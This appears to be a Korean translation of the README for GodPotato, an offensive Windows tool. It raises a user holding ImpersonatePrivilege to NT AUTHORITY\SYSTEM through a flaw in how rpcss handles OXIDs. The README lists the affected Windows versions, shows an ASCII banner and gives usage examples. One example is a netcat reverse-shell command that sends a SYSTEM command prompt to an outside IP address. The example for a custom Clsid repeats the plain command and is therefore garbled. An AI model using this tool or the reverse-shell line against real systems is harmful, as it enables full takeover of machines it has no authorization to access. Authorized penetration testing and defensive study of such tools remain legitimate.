
DCOM 기반 권한 상승 도구로, Windows Server 2012-2022 및 Windows 8-11에서 ImpersonatePrivilege를 가진 사용자를 rpcss oxid 취약점을 통해 NT AUTHORITY\SYSTEM으로 상승시킵니다.
6년간의 RottenPotato에서 JuicyPotatoNG까지의 Potato 권한 상승 역사를 바탕으로 DCOM을 연구하여 Windows 2012 ~ Windows 2022에서 권한 상승이 가능한 새로운 기술을 발견했습니다. 이제 "ImpersonatePrivilege" 권한만 있으면 "NT AUTHORITY\SYSTEM"이 됩니다. 일반적으로 웹 서비스 및 데이터베이스 서비스는 "ImpersonatePrivilege" 권한을 가지고 있습니다.
Potato 권한 상승은 일반적으로 웹/데이터베이스 권한을 획득했을 때 사용됩니다. 낮은 권한의 서비스 사용자를 "NT AUTHORITY\SYSTEM" 권한으로 상승시킬 수 있습니다. 그러나 기존 Potato는 최신 Windows 시스템에서 실행할 방법이 없었습니다. DCOM을 연구하던 중 권한 상승을 수행할 수 있는 새로운 방법을 발견했습니다. rpcss가 oxid를 처리할 때 약간의 결함이 있으며, rpcss는 시스템이 반드시 열어야 하는 서비스이므로 거의 모든 Windows OS에서 실행할 수 있습니다. 이를 GodPotato라고 명명했습니다.
Windows Server 2012 ~ Windows Server 2022 Windows8 ~ Windows 11
FFFFF FFF FFFFFFF
FFFFFFF FFF FFFFFFFF
FFF FFFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFF FFF FFF FFF FFF FFF FFF
FFFF FFFFFFF FFFFFFFF FFF FFF FFFFFFF FFFFFFFFF FFFFFF FFFFFFFFF FFFFFF
FFFF FFFF FFFF FFF FFFF FFF FFFF FFFF FFFF FFF FFF FFF FFF FFF FFFF
FFFF FFFFF FFF FFF FFF FFF FFFFFFFF FFF FFF FFF F FFF FFF FFF FFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFF FFF FFF FFFF
FFFF FFF FFF FFFFFFF FFF FFF FFFF FFF FFF FFFFFFFF FFF FFF FFFF
FFF FFF FFF FFF FFF FFF FFF FFF FFF FFF FFFF FFF FFF FFF FFFF
FFFF FFFF FFFF FFF FFFF FFF FFF FFF FFFF FFF FFFF FFF FFF FFFF FFF
FFFFFFFF FFFFFFF FFFFFFFF FFF FFFFFFF FFFFFF FFFFFFFF FFFFFFF FFFFFFF
FFFFFFF FFFFF FFFFFFF FFF FFFFF FFFFF FFFFFFFF FFFF FFFF
인자:
-cmd 필수: True 명령줄 (기본값 cmd /c whoami)
예시:
GodPotato -cmd "cmd /c whoami"
프로그램 내장 Clsid를 사용하여 권한 상승 및 간단한 명령 실행
GodPotato -cmd "cmd /c whoami"

Clsid를 사용자 지정하고 명령 실행
GodPotato -cmd "cmd /c whoami"

리버스 셸 명령 실행
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
zcgonvh
skay